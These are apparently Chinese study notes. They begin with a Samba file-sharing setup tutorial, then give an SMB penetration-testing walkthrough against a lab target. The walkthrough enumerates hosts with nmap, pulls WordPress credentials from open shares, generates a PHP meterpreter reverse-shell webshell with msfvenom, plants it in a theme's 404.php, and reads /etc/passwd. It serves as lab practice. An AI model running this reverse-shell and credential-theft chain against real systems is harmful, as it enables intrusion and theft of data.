SMB是一个网络文件共享协议，它允许应用程序和终端用户从远端的文件服务器访问文件资源

SMB 一种客户机/服务器、请求/响应协议。通过 SMB 协议，客户端应用程序可以在各种网络环境下读、
写服务器上的文件，以及对服务器程序提出服务请求。此外通过 SMB 协议，应用程序可以访问远程服务器端
的文件

其另一个意思是Linux系统下的一个工具samba的简称smb

Linux系统上默认安装samba

Linux安装了samba软件后，就可以实现SMB，使得Linux可以和windows连在一起，实现二者的资源互享

Samba通过它可以轻松实现文件共享。Samba的功能很强大，在Linux服务器上的Samba运行起来以后，Linux
就相当于一台文件及打印服务器，向Windows和Linux Samba客户提供文件及打印服务。

//////////////////////////

kali上使用apt-get install samba安装samba软件

然后命令行输入samba，若成功表示安装成功

1.安装服务
[root@client
 ~]# yum install samba samba-common samba-client.x86_64 -y
[root@client
 ~]# systemctl start smb nmb
[root@client
 ~]# systemctl enable smb nmb


2.添加用户
[root@client
 ~]# smbpasswd -a student ##添加student用户
New
SMB
password:
##输入smb当前用户密码
Retype
 new SMB
password:
##确认密码
Added
 user student.
[root@client
 ~]# pdbedit -L ##列出所有用户名
student:1000:User
 student[root@client
 ~]# pdbedit -x student ##删除用户名

[root@client
 ~]# setsebool samba_enable_home_dirs=1 ##在selinux上设置布尔值使smb用户可以访问自己的家目录



3.共享目录设定
[root@localhost
 ~]# vim /etc/samba/smb.conf

[haha]
##共享名称
  
comment =
local
 directory ##对共享目录的描述
 
path =
/smbshare ##共享目录的绝对路径





当共享目录为用户自建目录时
[root@localhost ~]# semanage fcontext -a -t samba_share_t '/smbshare(/.*)?'    ##更改目录及其以下所有文件的安全上下文
[root@localhost ~]# restorecon -RvvF /smbshare/                    ##刷新

当共享目录为系统建立目录时
[root@localhost ~]# vim /etc/samba/smb.conf 
        [haha]
        comment = local directory
        path = /etc
        workgroup = WESTOS
[root@localhost ~]# setsebool -P samba_export_all_ro on        ##只读共享
[root@localhost ~]# setsebool -P samba_export_all_rw on        ##读写共享

匿名用户
[root@localhost ~]# vim /etc/samba/smb.conf 
125         map to guest = bad user     ##将所有samba系统主机所不能正确识别的用户都映射成guest用户
            guest ok = yes              ##允许guest登录





访问控制
hosts allow =       ##仅允许
hosts deny =        ##仅拒绝 



valid
 users = ##当前共享的有效用户
 
valid
 users = westos ##当前共享的有效用户 
westos
 valid users = @westos
##当前共享的有效用户为westos组 
valid
 users = +westos ##当前共享的有效用户为westos组





读写控制

所有用户均可写
[root@localhost ~]# chmod o+w /mnt
[root@localhost ~]# setsebool -P samba_export_all_rw on
[root@localhost ~]# vim /etc/samba/smb.conf 
        writable = yes
1
2
3
4
1
2
3
4

设定指定用户可写
[root@localhost ~]# vim /etc/samba/smb.conf 
        write list = student    ##可写用户
    admin users = westos    ##共享的超级用户组
    write list = @student   ##可写用户组
    write list = +student
1
2
3
4
5
1
2
3
4
5


测试
mount -o username=student,password=redhat //172.25.254.119/haha /mnt
touch

smb多用户挂载

在client上



vim /root/haha          ##用户文件
username=student
password=redhat

chmod 600 /root/haha
yum install cifs-utils -y
mount -o credentials=/root/haha,multiuser,sec=ntlmssp //172.25.254.119/haha /mnt
##credentoals=/root/haha 指定挂载时所用到的用户文件
##multiuser      支持多用户认证
##sec=ntlmssp        认证方式为标准smb认证方式
1
2
3
4
5
6
7
8
9
10
1
2
3
4
5
6
7
8
9
10

测试
su - kiosk
ls /mnt
ls: cannot access /mnt: Permission denied   ##因为没有做smb的认证 所以无法访问smb共享

cifscreds add -u westos 172.25.254.119      ##添加用户认证
Password:       ##smb用户认证的密码
ls /mnt

#查看版本号

hostnamectl   

关闭防火墙

systemctl stop firewalld

安装smb

yum install -y samba

systemctl start smb nmb

systemctl enable smb nmb

systemctl restart smb nmb

查看smb/nmb的监听端口是否打开

netstat -anlpt |grep smb

netstat -anlpu | grep nmb

添加到防火墙白名单放行

firewall -cmd --permanent --add-service=samba

firewall -cmd --reload

关闭Selinux

setenforce 0

查看selinux状态   sestatus  命令

永久关闭 SeLinux，修改配置文件/etc/selinux/config， vi /etc/selinux/config,将SELINU置为disabled 

确保setlinux关闭，可以用setenforce 0命令执行。 默认的，SELinux禁止网络上对Samba服务器上的共享目录进行写操作，即使你在smb.conf中允许了这项操作。

setenforce 1 设置SELinux 成为enforcing模式

setenforce 0 设置SELinux 成为permissive模式  

如果要彻底禁用SELinux 需要在/etc/sysconfig/selinux中设置参数

建立测试目录和用户(用户名 myy)

useradd myy

smbpasswd -a myy

smbpasswd -e myy


mkdir /data

chown myy /data

检测用户是否添加成功

pdbedit -L

给测试目录755权限

chown -R 0755 /data

chmod -R 0755 /data      给文件加权限

 chown -R zhang:zhang /data   改变文件所属者

cp -a  /etc/samba/smb.conf /etc/samba/smb.conf.bak   复制配置文件做备份

vim /etc/samba/smb.conf

[data]

       path = /data

        browseable = yes

        writable = yes

        guest ok = no

         valid users = @myy

测试语法是否正确

testparm

 

systemctl restart smb nmb

SMB渗透学习过程
1.SMB介绍
SMB(全称是Server Message Block)是一个协议名，它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆（Barry Feigenbaum）研制的，其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。

百度百科

准备条件：kali 攻击机：192.168.31.101

靶场： 192.168.31.62
2.探测过程
（1）使用netdiscover -r 192.168.31.1/24（子网掩码）探测到局域网内的靶场地址为：192.168.31.62

（2）使用nmap -sV 192.168.31.62(靶场地址)探测靶场开放的服务

nmap指令详解

nmap -A -v -T4 192.168.31.62

针对smb协议弱点分析：使用smbclient -L 192.168.31.62







get deets.txt 到桌面，然后打开另一个终端，在桌面打开deets.txt
查看wp-config.php
cd/wordpress

get wp-config.php

gedit wp-config.php

使用mysql尝试连接
mysql 192.168.31.62 -u Admin -p

password : 粘贴密码

ssh Admin@192.168.31.62

粘贴密码


两种方式都失败

又因开启了http协议则使用dirb http：192.168.31.62

找到wp-admin链接并打开



打开链接后使用账号密码登录，登录成功界面


制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=4444 -f raw



复制产生代码到本地
gedit shell.php


 启动监听
msfconsole


设置参数
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.31.101 （攻击机地址）
run



启动成功，等待连接



上传webshell代码


提交后浏览器输入访问点
192.168.31.62/wordpress/wp-content/themes/twentyfifteen/404.php

连接成功：

cat /etc/passwd



发现togie用户

切换到togie用户，密码为12345


提升权限





视频教程链接